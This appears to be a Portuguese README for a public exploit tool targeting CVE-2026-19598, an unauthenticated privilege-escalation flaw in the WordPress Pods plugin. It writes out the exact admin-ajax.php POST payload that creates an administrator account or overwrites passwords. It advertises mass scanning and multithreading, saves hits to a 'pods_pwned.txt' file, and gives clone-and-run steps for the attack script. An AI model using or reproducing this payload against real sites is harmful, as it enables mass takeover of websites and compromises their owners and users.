
Explora a CVE-2026-19598 no plugin Pods do WordPress para criar contas de administrador ou sobrescrever senhas por meio de uma requisição AJAX não autenticada, com suporte a varredura em massa e multithreading.
Escalação de Privilégios Não Autenticada Crítica (CVSS 9.8) — Plugin Pods do WordPress ≤ 3.3.9
Esta ferramenta explora a CVE-2026-19598, uma vulnerabilidade no plugin Pods do WordPress que permite que atacantes não autenticados criem novas contas de administrador ou sobrescrevam senhas de usuários existentes por meio do endpoint admin-ajax.php.
| Propriedade | Valor |
|---|---|
| ID CVE | CVE-2026-19598 |
| Pontuação CVSS | 9.8 (Crítica) |
| CWE | CWE-284 — Controle de Acesso Improprio |
| Produto Afetado | Plugin Pods do WordPress ≤ 3.3.9 |
| Versão Corrigida | 3.3.9.1 |
| Autenticação Necessária | TIDAK (não autenticado) |
| Status | Exploração Ativa |
A vulnerabilidade existe na ação AJAX pods_admin. Devido a verificações de permissão inadequadas, o método save_user pode ser chamado sem autenticação quando o parâmetro meta-box-loader está presente. Isso permite que um atacante:
POST /wp-admin/admin-ajax.php action=pods_admin method=save_user meta-box-loader=1 user_login=evil_admin user_pass=Hacked123! role=administrator
O plugin não verifica se o usuário que faz a solicitação possui as capacidades adequadas, e o parâmetro meta-box-loader contorna as verificações de segurança pretendidas.
pods_pwned.txt com todos os alvos exploradosrequests# Clonar o repositório
git clone https://github.com/0xCyp1337/CVE-2026-19598.git
cd CVE-2026-19598
python3 CVE-2026-19598.py
# Instalar dependências (apenas requests é necessário)
pip install requests